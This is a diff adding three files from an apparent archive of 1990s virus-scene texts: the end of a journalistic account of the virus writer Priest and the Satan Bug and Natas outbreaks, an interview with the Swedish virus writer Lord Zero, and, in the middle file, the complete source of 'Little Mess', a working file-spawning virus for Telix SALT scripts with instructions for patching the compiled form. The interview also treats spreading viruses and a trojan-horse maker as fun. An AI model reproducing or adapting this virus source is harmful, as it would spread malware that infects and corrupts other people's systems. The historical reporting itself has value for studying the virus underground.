+software would be subverted, spreading Eddie to every
+program on the disk in one sweep. Eddie would also
+mangle a part of the machine's command shell when it jumped
+into memory from an infected program.
+When this happened, the command processor would reload
+itself from the hard disk and promptly be infected, too.
+This put the Eddie virus in total charge of the machine.
+From that point on, every sixteen infections, the virus
+would take a pot shot at a sector of the hard disk,
+obliterating a small piece of data.  If the data were
+part of a never-used program, it could go unnoticed.
+So as long as the Eddie virus was in command, the
+user stood a good chance of having to deal with a slow,
+creeping corruption of his programs and data.
+
+Little Loc was a good student of the Dark Avenger's
+programming and although he was completely self-taught,
+he had more native ability than all of the other virus
+programmers in the phalcon/SKISM and NuKE hacking groups.
+"[Virus writing] was something to do besides blasting furballs
+in Wing Commander," he said blithely when asked about
+the origins of his career as a virtuoso virus writer.
+
+Accordingly, the Satan Bug was just as fast an infector as
+Eddie and it, too, would immediately go after
+the command shell when launched into memory from
+an infected program.  But Satan Bug was very
+cleverly encrypted, whereas Eddie was not,
+and it extended these encryption tricks so that it
+was cloaked in computer memory, a feature somewhat
+unusual in computer viruses but popularized by another
+program called The Whale which intrigued Little Loc.
+
+The Whale was a German virus which - theoretically -
+was the most complex of all computer viruses.  It
+was packed with code which was supposed to make it
+stealthy -- invisible to certain anti-virus software
+techniques.  It was armored with anti-debugging code
+and devilishly encrypted, designed purely to
+flummox anti-virus software developers trying to examine it.
+They would often mention it as an example of a super
+stealth virus to mystified science and technology
+writers looking for good copy. In practice, The
+Whale was what one might call anti-stealth.
+Although it was all the things mentioned and more,
+when run on any machine, The Whale's processes
+were so cumbersome the computer would be forced to
+slow to a crawl. Indeed, it was a clever fellow who could
+get The Whale to consent to infect even one program.
+
+The Whale appeared to be purely an intellectual
+challenge for programmers.  It was intended to mesmerize
+anti-virus software developers and suck them into
+spending hours analyzing it. Little Loc, too, was
+drawn to it.  He pored over the German
+language disassembly of The Whale's source code.
+The hacker even made a version that wasn't encrypted,
+pulling out the code which The Whale used to generate
+its score of mutant variations. It didn't help. The
+Whale, even when disassembled, was loathe to let go of
+its secrets and remained a slow, obstinately
+uninfective puzzle.
+
+Have you gotten the idea that Prodigy callers might
+not be the perfect choice as an audience to
+appreciate Little Loc's Satan Bug?
+
+Nevertheless, Little Loc landed on Prodigy with a thud.
+He described the Satan Bug and invited anyone who
+was interested to pick up a copy of its source code at
+a bulletin board system where he'd stashed it.  Immediately,
+the hacker got into a rhubarb with a Prodigy member named
+Henri Delger.  Delger was, for want of a better description,
+the Prodigy network's unpaid computer virus help desk
+manager.  Every night, Delger would log on and look for
+the messages of users who had questions about computer
+viruses.  If they just wanted general information, Delger
+would supply it.  If they had some kind of computer glitch
+which they thought might be a virus, Delger would hold their
+hand until they calmed down, and then tell them what to
+do.  And, for the few who had computer virus infections,
+Delger would try to identify the virus and recommend
+software, usually McAfee Associates' SCAN, which would
+remedy the problem.
+
+Little Loc was annoyed by Delger, whom he thought was merely
+a shill for McAfee Associates.  Since Delger
+answered so many questions on Prodigy, he had a set of
+canned answers which he would employ to make the workload
+lighter.  The canned answers tended to antagonize Little Loc
+and other younger callers who fancied themselves hackers, too.
+Prodigy's liberal demo account policy allowed some of
+these young callers to get access to the network under
+assumed names like "Orion Rogue." This allowed them to be
+rude and truculent, at least for a few days, to paying
+Prodigy customers. These techno-popinjays, of course,
+immediately sided with Little Loc, which didn't do much for
+the virus programmer's credibility.
+
+There was often quite a bit of talk about viruses and Delger
+would supply much of the information, typing up brief
+summaries of virus effects embroidered with his own
+experiences analyzing viruses. "You're not a
+programmer!" Little Loc would storm at Delger.
+If you weren't a programmer, you couldn't understand viruses,
+insisted the author of Satan Bug. Little Loc would correct
+minor technical errors Delger made when describing the
+programs. In retaliation, Delger would calmly point out the
+spelling mistakes made by Little Loc and his
+colleagues. It was quite a flame war.  On one side
+was Little Loc, who gamely tried to get callers to appreciate
+the technical qualities of some viruses.  On the other side
+was a bunch of middle-aged computer hobbyists who were convinced
+all virus writers were illiterate teenage nincompoops in
+need of serious jail time, or perhaps a sound beating.
+
+The debates drew a big audience, including another hacker
+named Brian Oblivion, whose Waco, Texas, bulletin board,
+Caustic Contagion, would provide a brief haven for Satan
+Bug's author.  Little Loc, however, soon found other
+places that would accept his virus source code. Kim
+Clancy's famous Department of the Treasury Security
+Branch system was among them.  Little Loc logged on and proffered
+Satan Bug.  The Hell Pit - a huge virus exchange in
+a suburb of Chicago - had its phone number posted on Prodigy,
+as was that of one called Dark Coffin, a system in eastern
+Pennsylvania.  Dutifully, Little Loc couriered his virus to
+these systems, too.
+
+Satan Bug was a difficult virus to detect.  Although in
+a pinch you could find Satan Bug because of a trick
+change it made to an infected program's date/time stamp,
+for all intents and purposes Satan Bug was transparent
+to anti-virus scanners. And this window of opportunity
+stayed open for a surprising amount of time despite
+the fact that Little Loc had supplied the Satan Bug to
+all the public virus exchanges patrolled by anti-virus
+moles.
+
+Little Loc stood apart from other virus
+programmers who seemed to have little
+interest in whether their creations made it into
+the public's computers.  The real travel of his
+virus around the world would grant him recognition
+like that of the Dark Avenger, he thought. So, he
+wanted people to take Satan Bug and infect
+the software of others, period.
+Months later, after the virus had struck down the Secret
+Service network clear across the continent, I asked
+Little Loc how it might have gotten into the wild
+in large enough numbers so that it eventually found
+its way into such a supposedly secure system.
+
+"I'll tell you this once and only once: Satan Bug had help!"
+he said, simply.
+
+After his Prodigy debut and before Satan Bug hit the
+Secret Service, Little Loc was recruited by the virus-writing
+group phalcon/SKISM, changing his handle in the
+process to Priest.  Joining phalcon/SKISM didn't necessarily
+mean you were going to virus writing conventions in cyberspace
+with other members of the group, but it was a badge of
+status signifying to others in the computer underground who
+required such things that you had arrived, as a virus writer
+anyway.
+
+Since Priest lived on the West Coast, however, and the brain
+trust of phalcon/SKISM was located in the metro-NYC area,
+there was little concrete collaboration between the two,
+especially after Priest racked up a $600 telephone bill
+calling bulletin boards.  Since Priest didn't hack free
+phone service, his family had to pay the bill, which effectively
+cut down on much of his long distance telephone contact
+bulletin board systems like Caustic Contagion in Waco, Texas.
+
+Caustic Contagion, for a short period of time, was one of the
+better known virus exchange bulletin board systems.  Its
+sysop, Brian Oblivion, had an extremely liberal policy with
+regards to virus access and carried a large number of
+Internet/Usenet newsgroups which gave callers a semblance
+of access to the Internet. Caustic Contagion's other
+specialty, besides viruses, was Star Trek newsgroups and
+for some reason which completely eludes me, the BBS's
+callers found the convergence of computer viruses and
+Star Trek debate extremely congenial.
+
+Priest and another phalcon/SKISM virus writer named
+Memory Lapse would hang out on Caustic Contagion.
+Quite naturally, Oblivion's bulletin board was
+one of the first places to receive the
+programmers' newest creations, often
+before they were published in phalcon/SKISM's electronic
+publication, 40Hex magazine.
+
+Priest's next virus was Payback and it was written to punish
+the mainstream computing community for the arrest
+of Apache Warrior, the "president" of ARCV, a rather
+harmless but vocal English virus-writing group which had
+been undone when Alan Solomon, an anti-virus software
+developer, was able to convince New Scotland Yard's
+computer crime unit to seize the hacking group's equipment
+and software in a series of surprise raids. Priest's Payback
+virus would format the hard disk in memory of this event.
+Payback gathered little attention in the underground, mostly
+because few people knew much about ARCV and Apache
+Warrior in the first place.
+
+Another of Priest's interests was the set of
+anti-virus programs issued by the Dutch company,
+Thunderbyte.  The product of a virus researcher
+named Frans Veldman, the Thunderbyte programs were
+regarded by most virus writers as the anti-virus
+programs of choice.  They were sophisticated,
+technically sweet and put to shame similar software
+marketed by McAfee Associates, Central Point Software,
+and Symantec, which manufactured the Norton Anti-virus.
+
+One of Frans Veldman's programs, called TBClean,
+was of particular interest to Priest and others
+because it claimed to be able to remove
+completely unknown viruses from infected files.
+How it did this was a neat trick.  Essentially,
+TBClean would execute the virus-infected file
+in a controlled environment and try to take
+advantage of the fact that the virus always had
+to reassemble in memory an uncontaminated copy
+of the infected program to make it work
+properly.  TBClean would intercept this action
+and write the program back to the hard disk sans
+virus.  Priest and virus writer Rock Steady, the
+leader of the NuKE virus-writing group,
+had also noticed the phenomenon. Both tried writing
+viruses that would subvert the process and turn
+TBClean upon itself.
+
+Priest wrote Jackal, a virus which - under the proper
+conditions - would sense TBClean trying to execute
+it, step outside the Thunderbyte software's controls
+and format the hard disk.  In theory, this made Priest's
+virus the worst kind of retaliating program, with the
+potential to destructively strip unsuspecting users'
+hard disks of their data when they tried to disinfect
+their machines. (It couldn't happen if you just
+manually erased the Jackal-virus-infected program,
+but many people who use computers
+as part of everyday work simply want the option of having
+the software remove viruses. They don't want to
+have to worry about the technicalities
+of retaliating viruses designed to smash their data
+if they have the temerity to use anti-virus software.)
+
+Of course, Jackal's development was deemed
+a great propaganda victory by the North
+American virus underground.  Rock Steady nonsensically
+insisted Frans Veldman's programs were dangerous
+software because TBClean could be made to augment a
+virus infection instead of remove it.
+
+Brian Oblivion immediately tried Jackal out.  It didn't
+work, he said, but only caused TBClean to hang up
+his machine.  This was because Jackal was version
+specific, explained Priest.  It would only work on certain
+editions of the program.  In reality, this meant that
+Jackal's retaliating capability posed little threat
+to typical computer users, who had never heard of
+the virus-programmer's favorite software, Thunderbyte,
+much less TBClean. Nevertheless, Priest continued to
+write the TBClean subverting trick into his viruses,
+including it in Natas (that's Satan spelled backwards),
+which eventually got loose in Mexico City in the spring
+of 1994.
+
+All the routines to format a computer's hard disk and to
+slowly corrupt data ala the Eddie virus, which
+Priest had designed his Predator virus to do, made
+it clear the hacker cared little for any of the finer
+arguments over the value of computer viruses which were
+entertained from time to time by denizens of the underground
+as well as academics.  Viruses were for getting your name
+around, infecting files and destroying data, according
+to Priest.  He just laughed when the topic of ethical
+or productive uses of computer viruses -- such as the study
+of artificial life -- came up.
+
+In any case, by the fall of 1993, after Priest had
+retired from the Prodigy scene, Satan Bug was
+generating its own kind of media-fueled panic.
+
+On the Compuserve network, hysterical government
+employees were posting nonsensical alarums
+about the virus in the McAfee Associates
+virus information special interest group.
+
+"Satan's Bug" was part of a foreign power's attempt
+to sabotage government computers!  It was encrypted
+in nine different ways and was "eating" your data!
+A State Department alarm had started!
+
+Wherever the information about "Satan's Bug" was
+coming from, it was 100 percent phlogiston. Satan Bug was hardly
+aimed at government computer systems. It did not "eat" anything
+and although difficult for many anti-virus programs to scan, the
+virus could be found on infected systems by making good use
+of software designed to take a snapshot of the vital statistics
+of computer files and sound an alarm when these changed, which
+always happened when Satan Bug added itself to programs.
+
+Even more amusing was the suspicion that Satan Bug had been
+inserted on government computers by some undisclosed foreign
+country, from whence it originated.  I suppose, however,
+some people might consider Southern California a foreign country.
+
+Priest enjoyed reading these kinds of things.  His virus was
+famous, an obvious source of confusion and hysteria.
+
+About the same time, the Secret Service's computer network
+in Washington, D.C., was infected by the virus, which knocked
+the infected machines off-line for approximately three
+days.  News about the event was tough to keep secret among
+government employees and it leaked.  The Crypt Newsletter
+published a short news piece in its September 1993 issue
+on the event and reported that the infection had
+been cleaned up by David Stang, formerly of the National
+Computer Security Association, but now providing anti-virus
+and security guidance for Norman Data Defense Systems in
+Fairfax, northern Virginia.
+
+Jack Lewis, head of the Secret Service's computer crime
+unit, and two other agents flew out to interrogate
+Priest in his San Diego home in October of 1993.
+
+Lewis and the other agents gave Priest the third degree.
+They shook a printed-out copy of The Crypt Newsletter
+containing the Satan Bug story in his face and did
+everything in their power to make Priest think he ought
+to cease and desist writing computer viruses forthwith.
+
+"About the Secret Service, they weren't too happy about
+[Satan Bug], and saw fit to pay me a little visit," recalled
+Priest ruefully.
+
+The agents wanted to know everything about Priest - his Social
+Security number, where he'd travelled, even who the 16-year-old
+worked for.  But Priest didn't work for anyone.
+
+"I'm not quite sure they believed me," he said.
+"Apparently, they thought I worked for some anti-virus
+company or something to write viruses.  Plus, they wanted
+the sources for them."
+
+The Secret Service men wanted to know, straight from the
+horse's mouth, what Satan Bug did. "They said some victims were
+worried their systems weren't completely clean because they
+thought it might infect data files," Priest continued. "I told
+them it wouldn't.  They also wanted my opinion on things which
+surprised me, like different anti-virus programs and encryption
+algorithms, including Clipper. I didn't ask why.
+
+"Jack Lewis also said someone claimed I said 'All government
+computers will be infected by December' or some such rubbish.
+Apparently, they thought I wrote Satan Bug as a weapon against
+the government or whatever, I can't be too sure . . ."
+
+Priest told them no, Satan Bug wasn't specifically aimed at
+government computers, but it was hard to tell if the
+agents believed him. They were trained to reveal little,
+and to be unnerving to those interviewed.
+
+"They just stared," Priest said, "as they did in response to
+every question I asked, including 'what's your name?'
+I tried - really tried - to act cool, but my heart was pounding
+like a hummingbird's."
+
+The agents were keenly interested in Priest's other
+handles, all the viruses he had written, which, if any,
+computer systems he might have spread them on, the
+names of some phalcon/SKISM members and the structure
+of the virus-writing group and details of their
+hacking exploits.
+
+Priest declined to say anything about the identities of members
+of phalcon/SKISM. "I told them I knew nothing of the
+hackers and phreakers, and little more than you could pick up
+from reading an issue of 40Hex."
+
+Priest was more interested in other secretive agencies
+within the government.  He cultivated an interest in
+stories about deep black intelligence agencies.  Perhaps
+he envisioned himself writing destructive viruses as part
+of a covert weapons project for one of them.
+
+"Aren't there any other agencies which would be more
+interested in what I'm doing?" Priest asked the agents.
+He didn't get an answer.
+
+Eventually, the Secret Servicemen went away
+with a Priest-autographed printout of the source code
+to Satan Bug.
+
+Programming Satan Bug had turned out to be richly rewarding
+for Priest.  Not only had it gotten him recognized immediately
+in the computer underground, it had made him feared in the
+trenches of corporate America to the point where the Secret
+Service had felt compelled to intervene.
+
+Since the Satan Bug panic was a golden opportunity for anti-virus
+vendors to once again market wares, the stories in the
+computing press kept coming.  LAN Times put the virus on
+the front page of its November 1 issue with the headline,
+"Be on the Lookout for the Diabolical 'Satan Bug' Virus."
+LAN Times East Coast bureau chief Laura Didio
+wrote "the Satan Bug is designed
+to circumvent the security facilities in Novell Inc.
+Netware's NETX program, thereby allowing it to spread
+across networks."  While Satan Bug may have certainly
+spread across networks, it had nothing to do with the
+virus's design. It seemed no matter the truth about
+Satan Bug, the story just got more pumped up with
+phlogiston and air as it rolled along.
+
+"What's NETX?" asked Priest when he heard about the
+LAN Times article.
+
+Of course, the LAN Times article accurately served as
+an advertisement for the Satan Bug-detecting software
+of Norman Data Defense Systems and McAfee Associates.
+
+Priest, meanwhile, continued to work on viruses.
+He had just completed Natas, which he'd turned over
+to the Secret Service and to phalcon/SKISM for publication
+in an issue of 40Hex.  He also uploaded the virus to
+a couple of bulletin board systems in Southern
+California. And he finished a very small,
+96-byte .COM program-infecting virus.
+And there were other things he was working on, he said.
+
+The most interesting fallout from the Secret Service visit was
+a job offer from David Stang at Norman Data Defense
+Systems, said Priest.  Stang wanted the virus programmer
+to come to work for him, starting in the summer of 1994,
+after the hacker finished high school.
+
+Priest said Stang was interested in his opinion
+about the use of virus code in anti-virus software.
+Such code wasn't copyrighted, so it was fair game.
+Priest thought this was a bad idea.  Too much virus
+code, in his opinion, was crappy anyway, so why would
+anyone want to use it?  But Priest said he would think
+about the job offer.
+
+By May 1994, Priest's Natas virus had cropped up
+in Mexico City, where, according to one anti-virus software
+developer, it had been spread by a consultant providing
+anti-virus software services.  Through ignorance and
+incompetence, the consultant had gotten Natas attached
+to a copy of the anti-virus software he was using.
+However, like most of Priest's viruses, Natas was a bit
+more than most software could handle.  The software detected
+Natas in programs but not in an area of the hard disk known
+as the master boot record, where the virus also
+hid itself.  The result was tragicomic.  The consultant
+would search computers for viruses.  The software would find
+Natas!  Golly, the consultant would think,  "Natas is here!
+I better check other computers, too."  And so, the
+consultant would take his Natas-infected software to
+other computers where, quite naturally, it would also
+detect Natas as it spread the virus to the master boot
+record, a part of the computer where the software could
+not detect Priest's program.
+
+Natas had come to Mexico from Southern California.  The
+consultant often frequented a virus exchange bulletin
+board system in Santa Clarita which not only stocked Natas,
+but also the issue of 40Hex that contained its source
+code.  He had downloaded the virus, perhaps not fully
+understood what he was dealing with, and a month or so
+later uploaded a desperate plea for help with Priest's
+out-of-control program. You could tell from the date
+on the electronic cry for help -- May 1994 -- when Natas
+began being a real problem in Mexico.
+
+Natas was another typical tricky Priest program.  When in computer
+memory, it masked itself in infected programs and made them
+appear uninfected.  It would also retrieve a copy
+of the uninfected master boot record it carried encrypted in
+its body and fake out the user by showing it to him if he tried
+to go looking for it there.  Natas also infected diskettes
+and spread quickly to programs when they were viewed,
+copied or looked at by anti-virus software. It was fair to
+say that computer services providers wielding anti-virus
+software in a casual manner ought
+not to have been allowed anywhere near Natas.
+
+Back in San Diego, Priest was still being interviewed on the
+telephone by David Stang and other associates at Norman
+Data Defense Systems.  They were concerned that Priest
+might leak proprietary secrets to competitors after hiring,
+so it was a must that he be absolutely sure of the
+seriousness of his potential employment.
+
+By the end of the interview, Priest thought he didn't have
+much of a chance at the job, but by July he'd accepted
+an offer and moved to Fairfax to begin working for
+David Stang.  This was the same David Stang who had written
+in the July 1992 issue of his Virus News and Review magazine,
+"In this office, we try to see things in terms of black
+and white, rather than gray . . . The problem is that
+good guys don't wear white hats.  Among virus researchers
+are a large number of seemingly gray individuals . . .
+This grayness is clear to users. Last week, I asked my
+class if anyone in the room trusted anti-virus vendors.
+Not one would raise their hand . . . "
+
+But what was Priest working on at Norman Data Defense
+Systems?
+
+"A cure for Natas," he laughed softly one afternoon in
+late July, 1994, in the Norman Data office. Looking
+over the virus once more, Priest
+sardonically concluded that his disinfector made it clear the
+hacker had made Natas a little too easy to remove from
+infected systems. Norman Data Defense had clients in Mexico
+and at the Secret Service.
+
+You had to admire the moxie of the young American
+virus programmer. He'd set out in 1992 to emulate the
+world's greatest virus programmer, Dark Avenger, and
+ended up being paid cash money to cure the paintpots
+of computer poison he'd created. As for that poor stone
+fool, the legendary Dark Avenger, he never even got
+a handful of chewing gum for his viruses, having the
+misfortune to have been born in the wrong place, Bulgaria,
+at the wrong time, during the fall of Communism.
+
+But by the end of the summer, the blush was off the rose
+for Priest and Norman Data, too.  Another manager in the
+office, Sylvia Moon, didn't like the idea of the hacker
+working for the company, Priest said.  And when management
+representatives arrived from the parent corporation
+in Norway on an inspection tour and were appraised of
+Priest's status at a meeting, the hacker heard, they were
+not pleasantly surprised to learn there was a virus writer
+on the staff.  Officially, said Priest, there was no
+reaction, but in reality, the hacker felt, the atmosphere
+was deeply strained.  Nevertheless, said Priest,
+David Stang maintained that he would protect the hacker's
+position.  And Jack Lewis, said Priest, had contacted
+the company to set up a luncheon date with the hacker
+to discuss more technical issues.  However, Priest
+said, David Stang wanted Lewis to provide a Secret Service
+statement to the effect that the hiring of the hacker
+wasn't such a bad idea.  The luncheon fell through.
+The Secret Service would provide no such statement
+because, said Priest, it might be construed as a
+conflict of interest.  Unknown to him at the
+time, the agency had also started spying on
+his comings-and-goings in Fairfax.
+
+It all came to an end when one of Priest's acquaintances
+from the BBSes called the Norman Data office and left a
+message for "James Priest."  Priest was immediately
+let go.  David Stang, said Priest, told him the call was
+an indication that the hacker couldn't be trusted, that
+he was still in touch with the underground.
+
+Paranoia and recriminations flew.  There had been an intern
+from William & Mary working at the company whose father
+was a Pentagon official, said Priest.  The rumor was that
+Priest had been pumping the intern for information on
+how to penetrate Pentagon computers and siphoning it back
+into the underground.  It was nonsense, said the hacker,
+but it became the official version of events.  These
+were pretexts, thought Priest.  The real reason he had to
+be shown the door, he said, was pressure from the higher-ups
+in Norway.  They had been presented with him as a done-deal
+hire and it hadn't set well, he said. David Stang, said
+Priest, needed a reason to cut him loose and the phone call
+from the friend had been the peg to hang it on.  Priest
+was a hot potato and he had to go.
+
+Back in San Diego once again, Priest almost sounded relieved.
+He had a Sylvia Moon-autographed copy of a computer book
+as a memento from the company and that was it.  However,
+he had finally been able to videotape "The Satan Bug"
+telemovie.  He shifted the VCR into replay and turned
+to look at his computer while it was playing.  But the
+hacker said he still didn't know what the movie was about
+when it was over.  He had been too busy at the PC to
+pay attention.  Working . . .
+
+[Footnote:  All the Secret Service's contact with Priest
+and his viruses and source code appears, in retrospect,
+to not have been much of a learning exercise.  The organization
+recently awarded a large contract to Symantec, the makers 
+of the Norton Anti-virus, to provide insurance against
+computer virus attack.  The Norton Anti-virus has long
+been considered one of the worst choices imaginable
+for this type of service.]
+
+copyright 1994 American Eagle Publications
diff --git a/textfiles.com/virus/ltlmess.slt b/textfiles.com/virus/ltlmess.slt
new file mode 100644
index 00000000..421ba9d7
--- /dev/null
+++ b/textfiles.com/virus/ltlmess.slt
@@ -0,0 +1,91 @@
+// Little Mess spawning virus source (c) 92 Crom-Cruach/Trident
+// Source in SALT
+//
+// The compiled script needs some little changes:
+// *First, both 1234h's in the SLC must be replaced by (FileLen-011h)
+// *the 1st 11h bytes of the script must be copied over the 'REPLACE ME!';
+// *Both 1D 06 00's sequences MUST be replaced by 1D 02 00...
+
+// This is of course only educational, and even if it wasn't, it still wouldn't
+// spread due to the script exchange rate.
+//
+// Bad minds, however, might think it's fun having their local network-sysop
+// screaming about his system being infected while all anti-viral/integrity
+// programs miss it (or, him being dissed for saying he's got a
+// script-virus)... Of course, those people are wrong and/or sick.
+
+// Symptoms - 1 out of 8 times it displays a message for 1 sec after 
+// script execution if all scripts infected.
+
+// Greetz - NuKE / Phalcon/SKISM / YAM & All other practicing researchers...
+
+// Technical info ---
+//
+// First, the uninfected file is renamed to *.SLX.
+// Then, the SLC file is created and the copy of the header is written to it.
+// After that, the whole virus is written as a string to the file (SALT-string
+// identification code is 19h; offsets in SLC are calculated relative to the
+// end of the header (= on +0Ch) - The 06 -> 02 patch changes the offset of the
+// buffer to write from Title (+6) to [EndHeader+1] (+2)... The 1234-patch is
+// needed to fill in the size of that string). After that, some random bytes
+// are written to make the files less suspicious (the amount must be even; at
+// least, CS (the TELIX script compiler) never creates files with odd lengths)
+// I wanted to mark the SLX files as hidden; but in SALT you can only -read-
+// the attribute of a file. Solution could be to write a little routine in ASM
+// to a temporary file & to RUN that file; I decided not to, because the flash
+// from the shell-to-dos is much more obvious than some 'SLX'-files.
+
+// A system can be infected by starting this script from Telix. It will
+// infect one script at a time.
+
+int EndHeader = 0x123419;               // Needed for code-copy
+str Title[40] = "[Little Mess (c) 92 Crom-Cruach/Trident]";
+str Org_Ext[4] = ".SLX";
+
+str Path[64],Trash[64];
+str Buf[12] = "";                       // No script to start after 'mother'.
+str Spawned_On[12];
+
+// Header
+str Header[17]="REPLACE ME!";           // must be replaced by header (debug)
+int Handle;
+main()
+{
+ Spawned_On = Buf;
+ path = _script_dir;
+ strcat(path,"*.SLC");                  // Search script (not 8 chars-FName!)
+FNext:
+ if (not FileFind(path,0,Buf))          // File found?
+ { EndHeader=0; }                       // No more; mark 'all infected'
+ else
+ {
+  path = "";                            // Prepare for find-next
+  trash = _script_dir;
+  strcat(trash,Buf);                    // Trash = path+filename+ext
+  FNStrip(Trash,7,Buf);                 // Buf = filename only
+  strcat(Buf,Org_Ext);                  // Give new extension
+  if (frename(Trash,Buf) != 0) goto FNext;
+                                        // File not renamed (already spawned)
+
+  Handle = FOpen(Trash,"w");            // Make new file, same name
+  If (Handle == 0)                      // Error opening; restore orig. fname
+  {
+    Path = _script_dir;
+    strcat(path,Buf);                   // path = path+new_fname
+    frename(Path,Trash);                // rename-back
+    goto Quit_Infect;
+  }
+  FWrite(Header,17,Handle);             // Write header
+
+  FWrite(Title,0x1234,Handle);       // Title REPLACED by (ofs EndH.+1)
+
+  FWrite(Title,(CurTime()&254),Handle); // Make size random (must be even)
+  FClose(Handle);
+ }
+Quit_Infect:
+call(Spawned_On);                       // Start orig. script
+if ((EndHeader==0) and                  // If all infected
+ ((CurTime()&7)==7))                    // Show message 1 out of 8 times
+  Status_Wind("Legalize Marijuana! - �ڳ���",10);
+}
+
diff --git a/textfiles.com/virus/lzinterv.iew b/textfiles.com/virus/lzinterv.iew
new file mode 100644
index 00000000..163f7f59
--- /dev/null
+++ b/textfiles.com/virus/lzinterv.iew
@@ -0,0 +1,662 @@
+Here's a short interview with yet another swedish viruswriter,
+Lord Zero. One of his very old source-code follow this crappy
+interview wipped up in a few minutes it looks like :-).
+
+Lord Zer0 is the writer of Trojan Horse Maker, which never worked
+on my machine, but might work on some :-), and of viruses like
+Swedish_Warrior (included in IR#4) and others.
+
+I wish him good luck in the future and thank him for being swedish
+and writing viruses :-).
+
+- The Unforgiven.
+================================================================================
+
+TU> = The Unforgiven
+LZ> = Lord Zer0
+
+
+TU> Give me a short description of who you are?
+
+LZ> - My name is Alexander Augustus Napoleon...
+
+TU> From where did you get you handle, Lord Zer0?
+
+LZ> - From my brain...hehe
+
+TU> Does your handle has some specific meaning?
+
+LZ> - Sure, It means "The LoRD over all the Zer0s"
+
+TU> When did you discovered the world of computers?
+
+LZ> - When I was ten and my daddy brought home a PC from his office.
+
+TU> How long have you been active in the scene?
+
+LZ> - Since summer '93.
+
+TU> Why did you start to call boards and such things?
+
+LZ> - " Fame is our greatest enemy. "
+
+TU> How did you came into the virus business?
+
+LZ> - I got a copy of "The little black book of virus" by Mark Ludwig
+      and started experimenting with the "Timid" virus.
+
+TU> Why did you start to write viruses?
+
+LZ> - I've always liked to create things and if I could manage to create
+      "living" things that's exactly what I want to do.
+
+TU> Which goals do you have as a viruswriter?
+
+LZ> - Well, one of my goals is to finish "C.I.V", "Computer Immune
+      Virus" (EXE, WIN, MBR, maybe OS/2, Polymorphic(Gen_X), Stealth and
+      a lots of Anti-AV.)
+
+TU> What programming-languages are you familiar with, and what's your
+     favourite language?
+
+LZ> - I am familiar with Visual Basic, C, Quick Basic and Assembler.
+      Assembler is outstanding.
+
+TU> You wrote a trojan-horse maker some while back, is that now finished
+    project or have you plans to continue on it?
+
+LZ> - It's finished. The last version is 1.52.
+
+TU> Which responses have you had about it?
+
+LZ> - Well, I heard that it was spread like wildfire, many BBS's was
+      fucked up, and there was a war in Finland. DN (the largest Swedish
+      daily paper) got their Harddrives fuck-up.
+      (L.o.C. also got blacklisted on Internet and stuff like that, so
+      they had to change their name.)
+
+TU> Do you have any plans to write a virus-code generator?
+
+LZ> - Yes, I have one, which is nearly finished. (When I had the routine
+      creating the infected files left to write I got tired but I'll probably
+      finish it, one day, so stay alert.;) )
+
+TU> Do you release viruses/trojans into public?
+
+LZ> - Of course not! ;) Actually, there are already too many of them out
+      there, so a few of my NORMAL creations won't make any difference.
+      No phun! The viruses which are released must include some new ideas
+      or be very wide spead, to make someone notice them.
+
+TU> How many viruses has you written?
+
+LZ> - Ten maybe twenty, I don't really know(or care).
+
+TU> How do you name your viruses?
+
+LZ> - Well, in many different ways. I won't tell you..(I will require at
+      least half a page.)
+
+TU> What motivates you to write viruses?
+
+LZ> - You would never ask an artist: "Why do you paint ?"
+
+TU> Do you think you will continue to write viruses?
+
+LZ> - Yes, I will. Today, I can't see the end.
+
+TU> Would you feel guilty if one of your viruses made damage to a
+    hospital?
+
+LZ> - All my viruses are non-destructive. So don't blame me.
+      (And use my software at your own risk...hehe.)
+
+TU> Would you deliberate infect a school or government institution if you
+    know they would replicate well if you did so?
+
+LZ> - Yes, I think. If it could spread outside the institution. (I will
+      not infect a close system.)
+
+TU> Do you find it easier to infect pirated software (which is illegal to
+    use), than PD/SW software?
+
+LZ> - No, if I choose to infect a pirated software, I have to get
+      something very new if I want many users to get infected. That's the
+      big problem, and besides, elite users knows more about viruses than
+      PD/SW people do. So if  I'd try to spread a virus, I'd prefer to put
+      it in a PD/SW.
+
+TU> Do you encourage deliberate destructive code in viruses?
+
+LZ> - No. (I wouldn't want to get my HD overwritten, and I think nobody
+      likes that.)
+
+TU> Have you considered writing destructive code in viruses?
+
+LZ> - No, the highest goal of a virus is survival, so why then commit
+      suicide, with trashing the HD?
+
+TU> What to you think of the issue concerning 'undestructive-viruses'?
+
+LZ> - I don't agree to it... A virus should be undestructive..
+      That's my opinion.
+
+TU> Do you think one can make a virus beneficial?
+
+LZ> -  Sure, but then the "virus" is spelled: S O F T W A R E
+
+TU> Have you ever considered writing a GOOD virus?
+
+LZ> - Nope,...How can a virus be GOOD ?
+
+TU> Bontchev described in his 'write-up' "Is good Computer-Viruses still
+     a bad idea", do you think one of those viruses can be classified
+     good?
+
+LZ> - A virus, which search/watch for something or update a software,
+     may be  a beneficial virus.
+
+TU> Do you have any more arguments why viruses can't be beneficial than
+    the one Bontchev mentioned in his article?
+
+LZ> - My arguments won't make anything different. There're too many
+      problems to solve, and one or two more won't matter.
+
+TU> If you think its possible to write a good virus, how to solve the
+    above problems?
+
+LZ> - Ask God ;)
+
+TU> About virus-code-generators, what is your opinion about them, and
+    about people using them thinking they are hot-shot-eleete?
+
+LZ> - It's a good idea, but it's rather useless. I my opinion people
+      using code-generators are lame or stupid. (They want to make a
+      virus but can't or are too lame to write one..BaH!)
+
+LZ> Do you write viruses to get recognition in the virus/AV community?
+
+LZ> - No. I just write viruses, because I think it's fun.
+
+TU> What do you think about the media/AV describing viruswriters as
+    lonely individuals with no life?
+
+ LZ> - A person who can always do exactly what he wants without having to
+      care about what people think has a FREE life.
+      And about friends; I've got plenty of friends, friends who know
+      things  about myself and my virustechnique that I've only told them
+      because I can trust them. For example the guys reading through
+      this interview, my press staff...But... to the people who wants
+      the truth: Make up your own opinion!
+
+TU> Do you think the scene is asocial or not?
+
+LZ> - It depends on what you make of it, doesn't it?
+
+TU> How are you in real life (in a private matter).
+
+LZ> - A highly respectable young man, who loves life and doing good at
+      school, which means nothing.(It could be any boy/girl in sweden,
+      who cares about the school.)
+
+TU> How do you make your living?
+
+LZ> - Nothing, just spend my parents money.
+
+TU> Have the scene/viruswriting influent you in real life?
+
+LZ> - Yes a bit, but not much.
+
+ LZ> What do your parents/close friends thinks about your viruswriting?
+
+ LZ> - Some of my friends know that I write viruses, but they believe
+       that I won't spread my creations. I don't really know what my
+       parents know about my virus writing, but I suspect they know what
+       I'm doing and as long as  I'm doing good at school, they won't care.
+       They probably think that it's  just a "game", which will die out in a
+       couple of years.
+
+TU> Are you into viruswriting only or other parts of the
+    computer-underground?
+
